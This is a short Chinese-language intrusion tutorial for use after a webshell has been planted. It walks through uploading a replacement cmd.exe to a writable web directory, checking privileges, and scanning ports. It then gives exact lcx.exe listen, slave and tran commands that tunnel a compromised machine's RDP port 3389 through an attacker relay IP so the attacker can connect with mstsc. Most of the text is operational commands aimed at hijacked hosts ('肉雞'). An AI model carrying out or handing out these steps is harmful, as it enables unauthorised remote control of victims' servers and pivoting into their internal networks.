前提：上傳大馬進行提權

1.點選CMD命令，輸入whoami

2.顯示拒絕訪問,由此可以知道，系統cmd.exe不可用，可能是被刪除或者是禁止掉,需要我們自己上傳一個cmd.exe

3.網上下載一個cmd.exe，上傳到網站可執行可讀寫的目錄下

4.執行cmd命令，檢視當前許可權

5.執行netstat -an或者埠掃描，檢視開發埠

Lcx.exe是一個埠轉發工具，相當於把肉雞A上的3389埠轉發到具有外網IP地址的B機上，這樣連線B機的3389埠就相當於連結A機的3389埠。

Lcx有兩大功能，一個是埠轉發(listen和slave成對使用)，另一個是埠對映(tran)。

埠轉發：

Lcx -Listen <監聽slave請求的埠(對應slave的第二個引數)> <等待連線的埠>

Lcx -slave <你的ip> <監聽埠(對應listen的第一個引數)> <目標ip> <目標埠>

Lcx只有3種命令，常用的有2種（slave和listen）

埠轉發：

第一種方法：被控機和內網上傳lcx.exe

1.查詢中間機的外網ip: 2.2.2.2

2.中間機監聽: lcx.exe -listen 51 10000

3.內網機設定: lcx.exe -slave 2.2.2.2 51 127.0.0.1 3389

4.外網機連線被控制機的外網ip: mstsc 2.2.2.2:10000

第二種方法：內網機不能上傳lcx.exe

1.確定內網ip和本地ip,不需要被控制機的ip

2.本地執行：lcx -listen 40050 10000  //監聽埠，連線埠

3.被控制的計算機執行：lcx -slave 1.1.1.1 40050 10.10.0.3 3389   //監聽埠，目標埠

4.用mstsc連結：127.0.0.1:10000

埠對映：

Lcx -tran <等待連線的埠> <目標ip> <目標埠>